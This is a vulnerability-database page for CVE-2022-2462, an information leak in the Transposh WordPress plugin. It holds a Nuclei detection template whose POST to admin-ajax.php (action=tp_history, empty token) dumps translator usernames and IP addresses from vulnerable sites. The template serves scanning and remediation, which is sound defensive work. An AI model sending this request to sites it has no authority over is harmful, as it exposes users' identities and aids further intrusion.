| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Transposh WordPress Translation 1.0.8.1 Information Disclosure Vulnerability | 31 Jul 202200:00 | – | zdt | |
| Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit | |
| CVE-2022-2462 | 6 Sep 202218:15 | – | attackerkb | |
| CVE-2022-2462 | 6 Sep 202222:19 | – | circl | |
| WordPress plugin Transposh WordPress Translation 信息泄露漏洞 | 29 Jul 202200:00 | – | cnnvd | |
| CVE-2022-2462 | 6 Sep 202217:18 | – | cve | |
| CVE-2022-2462 Transposh WordPress Translation <= 1.0.9.6 - Sensitive Information Disclosure | 6 Sep 202217:18 | – | cvelist | |
| EUVD-2022-34723 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-2462 | 6 Sep 202218:15 | – | nvd | |
| CVE-2022-2462 | 6 Sep 202218:15 | – | osv |
id: CVE-2022-2462
info:
name: WordPress Transposh <=1.0.8.1 - Information Disclosure
author: dwisiswant0
severity: medium
description: |
WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
remediation: |
Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/167878/wptransposh1081-disclose.txt
- https://github.com/oferwald/transposh
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2462
- https://nvd.nist.gov/vuln/detail/CVE-2022-2462
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2462
cwe-id: CWE-200
epss-score: 0.02936
epss-percentile: 0.85423
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss,vuln
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
body: "action=tp_history&token=&lang=en" # we leave the value for 'token' with an empty string so it fetch all history
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(transposh) > 0" # 'transposh' equivalent for Transposh header key
- type: word
part: body
words:
# because the query is `SELECT translated, translated_by, timestamp, source, user_login [...]`
- "translated"
- "translated_by"
- "timestamp"
- "source"
- "user_login"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022037527989b07adc1c118f16403e2a92ff9928b3f5e057391e0634e436de7ceccd022100efc1412199e3fbad339a7412b3b69c0678fb735626fa6d14174abcd00a01758d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation